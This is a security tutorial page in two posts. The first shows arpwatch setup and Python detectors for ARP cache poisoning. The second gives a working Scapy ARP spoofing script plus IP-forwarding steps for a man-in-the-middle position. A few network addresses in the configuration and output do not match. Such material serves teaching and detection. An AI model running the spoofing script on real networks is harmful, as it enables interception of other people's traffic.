  • Defend ARP poisoning attacks with code your own arpwatcher

    My dear Linux lovers, how are you all? Do you remember that you were reading about ARP cache poisoning here? If you don't, it doesn't matter: after this post you will not forget it again, so bookmark the site and let's get back to the topic.

    So, first of all let's recap ARP cache poisoning. The functionality of the Address Resolution Protocol (ARP) was described in another post (https://www.kumaratuljaiswal.in/2021/09/master-local-area-network-lan.html). A computer that wants to send an IP packet to another host on the same network must first ask for the MAC address of the destination using ARP. That request is broadcast to every member of the network. In a perfect world the only computer that answers is the desired destination. In a not so perfect world an attacker can send the victim such an ARP reply every few seconds with its own MAC address as the answer, and thus redirect the victim's traffic to itself.
     

    To defend against ARP poisoning you can, on one side, use static ARP entries, although depending on the ARP handling code of the operating system those may still get overwritten by received ARP replies. On the other side you can use a tool such as an ARP watcher.

    An ARP watcher keeps an eye on the ARP traffic and reports suspicious behaviour, but it will not prevent it. Nowadays most modern intrusion detection systems can detect ARP cache poisoning attacks. You should check how your IDS behaves by running the poisoning script from our ARP cache poisoning post (further down this page) against a test host and watching what gets reported.


    There are two ways to do ARP watching: code your own ARP watcher, or use an existing tool. The choice is yours; both serve the same purpose.

    First we look at the existing tool, then we code our own.


    Arpwatch


    Arpwatch is an open-source program that monitors ARP traffic on your network and maintains a database of Ethernet/IP address pairings per interface. It logs every noticed pairing of IP and MAC address together with a timestamp. This tool is especially useful for network administrators who want to keep watch on ARP activity and detect ARP spoofing or unexpected IP/MAC address changes.


    Let's Install


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr/arpcache]
    └─$ sudo apt-get install arpwatch               
    [sudo] password for hackerboy: 
    Reading package lists... Done
    Building dependency tree... Done
    Reading state information... Done
    The following NEW packages will be installed:
      arpwatch
    0 upgraded, 1 newly installed, 0 to remove and 3 not upgraded.
    Need to get 49.0 kB of archives.
    After this operation, 161 kB of additional disk space will be used.
    Get:1 http://ftp.harukasan.org/kali kali-rolling/main amd64 arpwatch amd64 2.1a15-8 [49.0 kB]
    Fetched 49.0 kB in 16s (3,125 B/s)  
    Selecting previously unselected package arpwatch.
    (Reading database ... 407952 files and directories currently installed.)
    Preparing to unpack .../arpwatch_2.1a15-8_amd64.deb ...
    Unpacking arpwatch (2.1a15-8) ...
    Setting up arpwatch (2.1a15-8) ...
    update-rc.d: We have no instructions for the arpwatch init script.
    update-rc.d: It looks like a network service, we disable it.
    arpwatch.service is a disabled or a static unit, not starting it.
    Processing triggers for man-db (2.9.4-2) ...
    Processing triggers for kali-menu (2021.4.2) ...
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr/arpcache]
    └─$ 
    



    Arpwatch configuration description


    Arpwatch itself has no configuration file, but the systemd unit files shipped with Debian let you launch it with different options on each interface.

    To do that, create a file /etc/arpwatch/IFNAME.iface containing variable assignments in sh syntax (comments are allowed). Only the following variables are read, and they influence the invocation for that specific interface only:


    # ARGS: overwrite the ARGS from /etc/default/arpwatch
    # PCAP_FILTER: overwrite (or set) the pcap filter
    # IFACE_ARGS: additional options to be passed to arpwatch

                                                                                                                                                                                                
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$ cat /etc/default/arpwatch
    # Global options for arpwatch(8).
    
    # do not use the -i, -f or -u options here, they are added automatically
    # Debian: don't report bogons, don't use PROMISC.
    ARGS="-N -p"
    
    # if you want to add a pcap filter, uncomment and adjust the option below (you
    # will need spaces so adding -F to the ARGS above will cause problems). See -F
    # option in man 8 arpwatch for more information
    #PCAP_FILTER="not ether host (00:11:22:33:44:55 or 66:77:88:99:aa:bb)"
    
    # Debian: run as `arpwatch' user.  Empty this to run as root.
    RUNAS="arpwatch"
    
    # when using systemd you have to enable arpwatch explicitly for each interface
    # you want to run it on by running:
    # systemctl enable arpwatch@IFACE
    # systemctl start arpwatch@IFACE
    
    # For the LSB init script, enter a list of interfaces into the list below;
    # arpwatch will be started to listen on these interfaces.
    # Note: This is ignored when using systemd!
    # INTERFACES="eth0 eth1"
    INTERFACES=""
                                                                                                                                                                                                
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$ 
    
    
    



    I have several network interfaces on this machine and need to run arpwatch on the wlan0 interface:

          


                                                                                                                                                                                                
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$ ifconfig                                                                                                                                                                          130 ⨯
    eth0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
            ether b4:b6:86:47:55:83  txqueuelen 1000  (Ethernet)
            RX packets 0  bytes 0 (0.0 B)
            RX errors 0  dropped 0  overruns 0  frame 0
            TX packets 0  bytes 0 (0.0 B)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
    
    lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
            inet 127.0.0.1  netmask 255.0.0.0
            inet6 ::1  prefixlen 128  scopeid 0x10<host>
            loop  txqueuelen 1000  (Local Loopback)
            RX packets 688  bytes 61882 (60.4 KiB)
            RX errors 0  dropped 0  overruns 0  frame 0
            TX packets 688  bytes 61882 (60.4 KiB)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
    
    wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
            inet 192.168.249.25  netmask 255.255.255.0  broadcast 192.168.249.255
            inet6 fe80::aa80:f129:e78d:aa96  prefixlen 64  scopeid 0x20<link>
            inet6 2409:4064:200b:220c:7ad5:600b:2ea3:7963  prefixlen 64  scopeid 0x0<global>
            ether fc:01:7c:29:00:77  txqueuelen 1000  (Ethernet)
            RX packets 53817  bytes 30589399 (29.1 MiB)
            RX errors 0  dropped 0  overruns 0  frame 0
            TX packets 62412  bytes 47543548 (45.3 MiB)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
    
                                                                                                                                                                                                
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$ 
    
    
    


    In addition, on wlan0 I need to monitor MAC address changes not only for the local 192.168.249.0/24 network (the one wlan0 sits on in the output above), but also for the networks 192.168.122.0/24, 192.168.80/24 and 192.168.125.0/24. MAC address changes should be logged to a file and also mailed to arpwatch@mydomain.com.


    Arpwatch configuration


    Go to the /etc/arpwatch directory and create the file wlan0.iface (IFNAME.iface) with this content:


    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$ sudo nano wlan0.iface  
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$ cat wlan0.iface           
    INTERFACES="wlan0"
    ARGS="-N -p"
    IFACE_ARGS="-m arpwatch@mydomain.com -n 192.168.122.0/24 -n 192.168.80/24 -n 192.168.125.0/24"
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$ 
    
    


    Here is the man page for arpwatch: https://manpages.debian.org/unstable/arpwatch/arpwatch.8.en.html. The options used above:


    # The -m option specifies the e-mail address to which reports are sent. By default, reports go to root on the local machine.

    # The -n flag specifies additional local networks. This is useful to avoid bogon warnings when more than one network runs on the same wire. If the optional width/mask is not given, the default netmask for the network's class is used.

    # The -N flag disables reporting of any bogons.

    # The -p flag disables promiscuous operation. ARP broadcasts reach the interface without promiscuous mode, which saves the considerable resources that would otherwise be wasted on processing gigabytes of non-broadcast traffic. Enabling promiscuous mode does not mean getting 100% of the traffic that concerns arpwatch either.

    Note that the INTERFACES="wlan0" line in wlan0.iface is ignored: only ARGS, PCAP_FILTER and IFACE_ARGS are read from an .iface file, as described above. The systemctl status output further down shows the exact command line that resulted from the file, which is the quickest way to check that it was picked up.


    Arpwatch and systemd


    Now you can start arpwatch on the wlan0 interface with systemctl:

     

      
      
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$ sudo systemctl daemon-reload
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$ sudo systemctl start arpwatch@wlan0 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$ 
    
      

     

    You can check the arpwatch daemon's status:

     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
    └─$ sudo systemctl status arpwatch@wlan0                                                                                                                                                2 ⚙
    ● arpwatch@wlan0.service - arpwatch service on interface wlan0
         Loaded: loaded (/lib/systemd/system/arpwatch@.service; enabled; vendor preset: disabled)
         Active: active (running) since Tue 2022-01-25 18:10:08 IST; 28min ago
           Docs: man:arpwatch(8)
       Main PID: 26295 (arpwatch)
          Tasks: 1 (limit: 4366)
         Memory: 3.1M
            CPU: 745ms
         CGroup: /system.slice/system-arpwatch.slice/arpwatch@wlan0.service
                 └─26295 /usr/sbin/arpwatch -u arpwatch -i wlan0 -f wlan0.dat -N -p -m arpwatch@mydomain.com -n 192.168.122.0/24 -n 192.168.80/24 -n 212.158.133.0/24 -F ""
    
    Jan 25 18:10:08 KumarAtulJaiswal systemd[1]: Stopped arpwatch service on interface wlan0.
    Jan 25 18:10:08 KumarAtulJaiswal systemd[1]: arpwatch@wlan0.service: Consumed 2.360s CPU time.
    Jan 25 18:10:08 KumarAtulJaiswal systemd[1]: Starting arpwatch service on interface wlan0...
    Jan 25 18:10:08 KumarAtulJaiswal systemd[1]: Started arpwatch service on interface wlan0.
    Jan 25 18:10:08 KumarAtulJaiswal arpwatch[26295]: Running as uid=140 gid=149
    Jan 25 18:10:08 KumarAtulJaiswal arpwatch[26295]: listening on wlan0
    Jan 25 18:10:26 KumarAtulJaiswal arpwatch[26295]: new station 192.168.249.79 e6:e4:e4:95:1e:27 wlan0
    Jan 25 18:10:26 KumarAtulJaiswal arpwatch[26295]: new station 192.168.249.25 fc:01:7c:29:00:77 wlan0
    Jan 25 18:34:18 KumarAtulJaiswal arpwatch[26295]: new station 192.168.249.45 08:00:27:67:67:30 wlan0
    Jan 25 18:34:18 KumarAtulJaiswal arpwatch[26295]: changed ethernet address 192.168.249.45 fc:01:7c:29:00:77 (08:00:27:67:67:30) wlan0
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
    └─$    
    
    

     

    new activity – This Ethernet/IP address pair has been used for the first time in six months or more.

    new station – The Ethernet address has not been seen before.

    flip flop – The Ethernet address has changed from the most recently seen address to the second most recently seen address. If either the old or new Ethernet address is a DECnet address and it is less than 24 hours, the email version of the report is suppressed.

    changed ethernet address – The host switched to a new Ethernet address.

    The last line of the status output above is what a poisoning run looks like from arpwatch's side: 192.168.249.45 was first learned with 08:00:27:67:67:30 and then "changed" to fc:01:7c:29:00:77. That MAC belongs to this machine's wlan0 (see the ifconfig output) and is already registered for 192.168.249.25, so one network card is now answering for two IP addresses. That is the signature to alert on; a single "changed ethernet address" by itself can also be a legitimate hardware swap or a DHCP lease handed to a different host.
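    The correlation described above, turned into code: an added example (not from the original post, not part of arpwatch) that parses arpwatch report lines and flags an address change whose new MAC already answers for another IP on the same interface. The sample lines are the ones from the status output above, embedded as constructed test data; the regex group names and function names are this example's own.

```python
import re
from typing import Dict, List, Set, Tuple

# Constructed sample input: the arpwatch lines from the systemctl status output
# above, embedded here so the script runs offline.
SAMPLE_LOG = """\
Jan 25 18:10:08 KumarAtulJaiswal arpwatch[26295]: listening on wlan0
Jan 25 18:10:26 KumarAtulJaiswal arpwatch[26295]: new station 192.168.249.79 e6:e4:e4:95:1e:27 wlan0
Jan 25 18:10:26 KumarAtulJaiswal arpwatch[26295]: new station 192.168.249.25 fc:01:7c:29:00:77 wlan0
Jan 25 18:34:18 KumarAtulJaiswal arpwatch[26295]: new station 192.168.249.45 08:00:27:67:67:30 wlan0
Jan 25 18:34:18 KumarAtulJaiswal arpwatch[26295]: changed ethernet address 192.168.249.45 fc:01:7c:29:00:77 (08:00:27:67:67:30) wlan0
"""

MAC = r"[0-9a-f]{1,2}(?::[0-9a-f]{1,2}){5}"
# One regex for the four report types listed above. "(old mac)" is only present on
# changed-address and flip-flop lines; the pid in brackets is optional because the
# file written by rsyslog omits it.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ [\d:]+) \S+ arpwatch(?:\[\d+\])?: "
    r"(?P<kind>new station|new activity|changed ethernet address|flip flop) "
    r"(?P<ip>\d+\.\d+\.\d+\.\d+) (?P<mac>" + MAC + r")"
    r"(?: \((?P<old>" + MAC + r")\))? (?P<iface>\S+)$"
)


def parse_arpwatch_log(text: str) -> List[Dict[str, str]]:
    """Return one dict per recognised report line; all other lines are ignored."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append(m.groupdict())
    return events


def find_shared_macs(events: List[Dict[str, str]]) -> List[str]:
    """Replay the reports in order and flag every address change where the new MAC
    is already registered for a different IP on the same interface: one NIC answering
    for two hosts is the classic ARP poisoning signature."""
    owners: Dict[Tuple[str, str], Set[str]] = {}   # (iface, mac) -> IPs seen with it
    alerts: List[str] = []
    for ev in events:
        key = (ev["iface"], ev["mac"])
        others = owners.get(key, set()) - {ev["ip"]}
        if ev["kind"] in ("changed ethernet address", "flip flop") and others:
            alerts.append(
                f"{ev['ts']} {ev['iface']}: {ev['ip']} moved from {ev['old']} to "
                f"{ev['mac']}, which already answers for {', '.join(sorted(others))}"
            )
        owners.setdefault(key, set()).add(ev["ip"])
    return alerts


if __name__ == "__main__":
    for alert in find_shared_macs(parse_arpwatch_log(SAMPLE_LOG)):
        print(alert)
```

    Feed it /var/log/arpwatch/arpwatch.log (or the journal) instead of SAMPLE_LOG to run it over real data. Expect legitimate hits from VRRP/HSRP failover, bonded NICs and virtual IPs hosted on one card; whitelist those MACs rather than relaxing the rule.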

     

     

     

    Check that arpwatch is running:


    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$ ps aux|grep arp
    hackerb+    4312  0.1  0.4 545140 18244 ?        Sl   08:38   0:03 leafpad /home/hackerboy/Desktop/Penetration-tester-jr/arpcache/arpwatch/arpwatch-content.txt
    root        6365  0.0  0.0  11140  3212 pts/1    S+   08:46   0:00 sudo python3 arpcache.py 192.168.122.45 192.168.122.30
    root        6376  0.1  2.0 129852 76892 pts/1    S+   08:46   0:03 python3 arpcache.py 192.168.122.45 192.168.122.30
    arpwatch   14690  0.0  0.1  13680  6700 ?        S    09:15   0:00 /usr/sbin/arpwatch -u arpwatch -i wlan0 -f wlan0.dat -N -p -m arpwatch@mydomain.com -n 192.168.122.0/24 -n 192.168.80/24 -n 192.168.125.0/24 -F
    hackerb+   19812  0.0  0.0   6316  2260 pts/3    S+   09:35   0:00 grep --color=auto arp
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$ 
    
    
    


    arpwatch after reboot


    You have to enable the arpwatch@wlan0 unit so that it starts again after a system reboot:


    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$ sudo systemctl daemon-reload                                                                                                                                                        1 ⚙
                                                                                                                                                                                                
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$ sudo systemctl enable arpwatch@wlan0                                                                                                                                                1 ⚙
    Created symlink /etc/systemd/system/multi-user.target.wants/arpwatch@wlan0.service → /lib/systemd/system/arpwatch@.service.
                                                                                                                                                                                                
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$      
    
    


     

    Create the /var/log/arpwatch directory and the file arpwatch.log in it:

     

                                                                                                                                                                                     
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$ sudo mkdir /var/log/arpwatch                                                                                                                                                    1 ⨯ 1 ⚙
                                                                                                                                                                                                
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$ sudo touch /var/log/arpwatch/arpwatch.log                                                                                                                                           1 ⚙
                                                                                                                                                                                                
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$ sudo chmod 666 /var/log/arpwatch/arpwatch.log                                                                                                                                       1 ⚙
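    Creating the file is not enough on its own: arpwatch logs through syslog (daemon facility), so without a routing rule its messages keep landing in /var/log/daemon.log and /var/log/syslog on Debian-based systems such as Kali, and the new file stays empty. The following rsyslog rule is an added example, not something shown on the original page; the file name under /etc/rsyslog.d/ is an assumption.

```conf
# /etc/rsyslog.d/arpwatch.conf  (added example; file name is an assumption)
# Route everything arpwatch logs into its own file and stop processing it further,
# so it does not also land in daemon.log and syslog.
if $programname == 'arpwatch' then /var/log/arpwatch/arpwatch.log
& stop
```

    The chmod 666 above is also worth reconsidering: rsyslog opens the file with its own privileges (root by default on Debian), so it does not need a world-writable log, and a world-writable log lets any local user forge or erase arpwatch reports. Use the same ownership and 640 mode as the other files in /var/log. After adding the rule, restart rsyslog as shown next.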
    

     

     

    And restart rsyslog daemon:

     

     

                                                                                                                                                                                            
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$ sudo systemctl restart rsyslog                                                                                                                                                127 ⨯ 1 ⚙
                                                                                                                                                                                                
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$           
    
    
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/var/log/arpwatch]
    └─$ sudo systemctl status rsyslog                                                                                                                                                       1 ⚙
    ● rsyslog.service - System Logging Service
         Loaded: loaded (/lib/systemd/system/rsyslog.service; enabled; vendor preset: enabled)
         Active: active (running) since Mon 2022-01-24 09:51:27 IST; 4min 30s ago
    TriggeredBy: ● syslog.socket
           Docs: man:rsyslogd(8)
                 man:rsyslog.conf(5)
                 https://www.rsyslog.com/doc/
       Main PID: 23919 (rsyslogd)
          Tasks: 4 (limit: 4366)
         Memory: 1.6M
            CPU: 173ms
         CGroup: /system.slice/rsyslog.service
                 └─23919 /usr/sbin/rsyslogd -n -iNONE
    
    Jan 24 09:51:27 KumarAtulJaiswal systemd[1]: Starting System Logging Service...
    Jan 24 09:51:27 KumarAtulJaiswal systemd[1]: Started System Logging Service.
    Jan 24 09:51:27 KumarAtulJaiswal rsyslogd[23919]: warning: ~ action is deprecated, consider using the 'stop' statement instead [v8.2110.0 try https://www.rsyslog.com/e/2307 ]
    Jan 24 09:51:27 KumarAtulJaiswal rsyslogd[23919]: warning: ~ action is deprecated, consider using the 'stop' statement instead [v8.2110.0 try https://www.rsyslog.com/e/2307 ]
    Jan 24 09:51:27 KumarAtulJaiswal rsyslogd[23919]: warning: ~ action is deprecated, consider using the 'stop' statement instead [v8.2110.0 try https://www.rsyslog.com/e/2307 ]
    Jan 24 09:51:27 KumarAtulJaiswal rsyslogd[23919]: warning: ~ action is deprecated, consider using the 'stop' statement instead [v8.2110.0 try https://www.rsyslog.com/e/2307 ]
    Jan 24 09:51:27 KumarAtulJaiswal rsyslogd[23919]: imuxsock: Acquired UNIX socket '/run/systemd/journal/syslog' (fd 3) from systemd.  [v8.2110.0]
    Jan 24 09:51:27 KumarAtulJaiswal rsyslogd[23919]: [origin software="rsyslogd" swVersion="8.2110.0" x-pid="23919" x-info="https://www.rsyslog.com"] start
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/var/log/arpwatch]
    └─$           
    
    


    And now you can see messages from the running arpwatch daemon:

     

     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
    └─$                                                                                                                                                                               130 ⨯ 2 ⚙
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
    └─$ cat /var/log/arpwatch/arpwatch.log   
                                                                                                                                             
    Jan 25 18:10:07 KumarAtulJaiswal arpwatch: exiting
    Jan 25 18:10:08 KumarAtulJaiswal arpwatch: Running as uid=140 gid=149
    Jan 25 18:10:08 KumarAtulJaiswal arpwatch: listening on wlan0
    Jan 25 18:10:26 KumarAtulJaiswal arpwatch: new station 192.168.249.79 e6:e4:e4:95:1e:27 wlan0
    Jan 25 18:10:26 KumarAtulJaiswal arpwatch: new station 192.168.249.25 fc:01:7c:29:00:77 wlan0
    Jan 25 18:34:18 KumarAtulJaiswal arpwatch: new station 192.168.249.45 08:00:27:67:67:30 wlan0
    Jan 25 18:34:18 KumarAtulJaiswal arpwatch: changed ethernet address 192.168.249.45 fc:01:7c:29:00:77 (08:00:27:67:67:30) wlan0
    
    

     

    arpwatch MAC address database

    The default directory for the arpwatch MAC address database is /var/lib/arpwatch. There is one file per interface, named IFNAME.dat, with one line per pairing: MAC address, IP address, Unix timestamp of the last time the pair was seen, and the interface name. You can print the database content:


     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
    └─$ cat /var/lib/arpwatch/wlan0.dat                                                                                                                                                 1 ⨯ 2 ⚙
    fc:01:7c:29:00:77       192.168.122.30  1643114422              wlan0
    fc:01:7c:29:00:77       192.168.122.25  1643045197              wlan0
    e6:e4:e4:95:1e:27       192.168.122.158 1643045197              wlan0
    e6:e4:e4:95:1e:27       192.168.249.79  1643119787              wlan0
    fc:01:7c:29:00:77       192.168.249.25  1643119770              wlan0
    fc:01:7c:29:00:77       192.168.249.45  1643119787              wlan0
    08:00:27:67:67:30       192.168.249.45  1643119391              wlan0
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
    └─$      
    

     

     

    NOTE: arpwatch writes the database to disk periodically and when it shuts down, so right after the first start the file is empty. Restart the daemon (the stop writes the file) to see any content.

     

     

    Arp-watcher

    Now we code our own ARP watcher (Python 3 with Scapy):

     

     

    #!/usr/bin/env python3
    # Minimal ARP watcher: learns IP -> MAC pairs from ARP replies, warns when a known
    # IP suddenly answers from a different MAC, and saves the table on Ctrl-C.
    import sys
    from signal import signal, SIGINT

    from scapy.all import sniff, ARP

    arp_watcher_db_file = "/var/cache/arp-watcher.db"
    ip_mac = {}


    # Save ARP table on shutdown
    def sig_int_handler(signum, frame):
        print("Got SIGINT. Saving ARP database...")
        try:
            with open(arp_watcher_db_file, "w") as f:
                for ip, mac in ip_mac.items():
                    f.write(ip + " " + mac + "\n")
            print("Done.")
        except IOError:
            print("Cannot write file " + arp_watcher_db_file)
            sys.exit(1)
        sys.exit(0)


    def watch_arp(pkt):
        # Only look at is-at packets (ARP replies, op code 2)
        if ARP not in pkt or pkt[ARP].op != 2:
            return
        ip, mac = pkt[ARP].psrc, pkt[ARP].hwsrc
        print(mac + " " + ip)
        if ip_mac.get(ip) is None:
            # IP seen for the first time. Remember it.
            print("Found new device " + mac + " " + ip)
            ip_mac[ip] = mac
        elif ip_mac[ip] != mac:
            # Known IP answering from a different MAC: the reply is probably forged.
            print("WARNING: " + ip + " changed from " + ip_mac[ip] + " to " + mac)
            ip_mac[ip] = mac


    if len(sys.argv) < 2:
        print(sys.argv[0] + " <iface>")
        sys.exit(0)

    # Load the previously learned IP -> MAC pairs, or give up if the file is unreadable
    try:
        with open(arp_watcher_db_file, "r") as fh:
            for line in fh:
                line = line.strip()
                if not line:
                    continue
                ip, mac = line.split(" ")
                ip_mac[ip] = mac
    except IOError:
        print("Cannot read file " + arp_watcher_db_file)
        sys.exit(1)

    signal(SIGINT, sig_int_handler)

    sniff(prn=watch_arp,
          filter="arp",
          iface=sys.argv[1],
          store=0)
    

     

     

    sudo python3 arpwatcher.py <iface>

    sudo python3 arpwatcher.py wlan0

    Sniffing needs raw socket access, hence sudo. The script exits if it cannot read /var/cache/arp-watcher.db, so create that file (empty is fine) before the first run.

     

    At the start we define a signal handler in sig_int_handler() that gets called when the user interrupts the program. This function saves all known IP to MAC resolutions from the ip_mac dictionary to a file. Afterwards we read that ARP db file to initialise the program with all currently known resolutions, or exit if the file cannot be read. Then we loop line by line through the file's content and split each line into IP and MAC to store them in the ip_mac dictionary. Finally we call the already known function sniff(), which invokes the callback function watch_arp for every received ARP packet.


    The function watch_arp implements the real logic of the program. When the sniffed packet is an is-at packet, and therefore an ARP reply, we first check whether the IP exists in the ip_mac dictionary. If there is no entry the device is new and we print a message to the screen; otherwise we compare the MAC address with the MAC in our dictionary. If it differs the reply is probably forged and we print a warning. In both cases the dictionary gets updated with the new information.

     

     


    Disclaimer

     

    All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other freely available vulnerable resources; they do not involve any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of this information and strongly advises against it. Please read the word hacking as ethical hacking or penetration testing every time it is used. We do not promote, encourage, support or incite any illegal activity or hacking.


  • Code your own ARP Cache Poisoning


    ARP-Cache-Poisoning


    The functionality of the Address Resolution Protocol (ARP) was described in another post (https://www.kumaratuljaiswal.in/2021/09/master-local-area-network-lan.html). A computer that wants to send an IP packet to another host on the same network must first ask for the MAC address of the destination using ARP. That request is broadcast to every member of the network. In a perfect world the only computer that answers is the desired destination. In a not so perfect world an attacker can send the victim such an ARP reply every few seconds with its own MAC address as the answer, and thus redirect the victim's traffic to itself.


    This works because most operating systems accept reply packets to questions they never asked and update the cache entry for that IP accordingly!
     

    Let's write the code in Python with Scapy:

     

     

    #!/usr/bin/env python3
    # Keeps sending unsolicited ARP replies ("is-at") to the target so that its
    # cache maps fake_ip to our own MAC address.

    import sys
    import time
    from scapy.all import sendp, ARP, Ether

    if len(sys.argv) < 3:
        # victim IP and the IP to impersonate, e.g.
        # sudo python3 arpcache.py 192.168.122.45 192.168.122.30
        print(sys.argv[0] + ": <target> <spoof_ip>")
        sys.exit(1)

    iface = "wlan0"
    target_ip = sys.argv[1]
    fake_ip = sys.argv[2]

    # Ethernet header: src defaults to our MAC, dst to broadcast (www.kumaratuljaiswal.in)
    widelan = Ether()
    # ARP reply: hwsrc defaults to our MAC, so it claims "fake_ip is-at <our MAC>"
    arp = ARP(pdst=target_ip, psrc=fake_ip, op="is-at")

    packet = widelan / arp

    while True:
        sendp(packet, iface=iface)   # layer 2 send: we built the Ethernet header ourselves
        time.sleep(10)
    
    
    







    With the help of Scapy we construct a packet called packet consisting of an Ether() and an ARP() header. In the ARP header we set the IP address of the victim (target_ip) and the IP whose connections we would like to hijack (fake_ip). As the last parameter we set the op code is-at, which declares the packet an ARP reply; the sender MAC defaults to our own. Afterwards the function sendp() sends the packet in an endless loop, waiting 10 s between deliveries. It is important to call sendp() and not send(), because the packet has to be sent on layer 2 with the Ethernet header we built; send() sends packets on layer 3.

     

     


     

     

     



    Additional detail


    For a short refresher:

    Ethernet is on layer 2, IP (Internet Protocol) on layer 3, TCP (Transmission Control Protocol) and UDP on layer 4, and services like HTTP, SMTP and FTP on layer 7.



    NOTE - One last thing to remember is to enable IP forwarding on the attacking host; otherwise it drops the victim's packets instead of relaying them and the victim's connections simply break.




    IP Forwarding


    Why do we need IP forwarding for the Scapy ARP cache poisoning? When a Linux host acts as a firewall, router or NAT device (or, as here, as a man in the middle), it must be able to forward packets that are addressed to destinations other than itself.

    Conversely, IP forwarding should normally be turned off if the machine is not in one of those roles. You don't want a system spending bandwidth or resources forwarding packets elsewhere unless it has been designed to do that job.



    Check current IP forwarding status


    Most systems will be able to use the sysctl command, which can apply kernel variables. Therefore, you can use the following sysctl command to check whether IP forwarding is enabled or disabled.

    # sysctl net.ipv4.ip_forward
    net.ipv4.ip_forward = 0

    In the example above, the net.ipv4.ip_forward kernel setting is 0. That means it’s off. If it were set to 1, that would mean it’s enabled.


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads]
    └─$ sysctl net.ipv4.ip_forward       
    net.ipv4.ip_forward = 0
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads]
    └─$ 
    
    



    You can also read the setting directly from the /proc file system: cat /proc/sys/net/ipv4/ip_forward prints 0 (disabled) or 1 (enabled).



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads]
    └─$ cat /proc/sys/net/ipv4/ip_forward
    0
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads]
    └─$ 
    
    
    




    Enable or disable IP forwarding


    You can use the following sysctl command to enable or disable Linux IP forwarding on the running kernel. The change is not persistent across reboots; to make it permanent, put the line net.ipv4.ip_forward=1 into /etc/sysctl.conf or a file under /etc/sysctl.d/.

    # sysctl -w net.ipv4.ip_forward=0
    OR
    # sysctl -w net.ipv4.ip_forward=1




    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads]
    └─$ sudo sysctl net.ipv4.ip_forward=1
    net.ipv4.ip_forward = 1
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads]
    └─$ 
    
    
    
    
    

    Check the IP forwarding setting again to confirm it is now enabled:



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads]
    └─$ sysctl net.ipv4.ip_forward
    net.ipv4.ip_forward = 1


    Code your own ARP Cache Poisoning


    Don't forget to check the settings of your packet filter (iptables, pf or ipfw) or just disable it. But now enough of the boring theory, let's jump into some practical Python code!

    If you only manipulate the ARP cache of the client with the fake_ip, you only get the packets of the client; the responses of the server will stay invisible.





    To enforce a bidirectional connection through the computer of the attacker, as illustrated above, the attacker has to forge the ARP entries of both the client and the server with his own MAC for the relevant destination. Our first code is a bit graceless and sends a lot of ARP packets. It not only generates more traffic than needed, it is also conspicuous. Stealthy attackers would use another tactic. A computer that wants to learn the MAC behind an IP address asks for it with an ARP request.




    Additional details:


    What is stealth?


